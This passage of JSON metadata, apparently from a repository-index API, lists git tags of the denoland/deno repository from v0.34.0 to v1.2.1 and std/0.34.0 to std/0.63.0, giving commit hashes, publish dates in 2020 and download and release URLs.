.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/den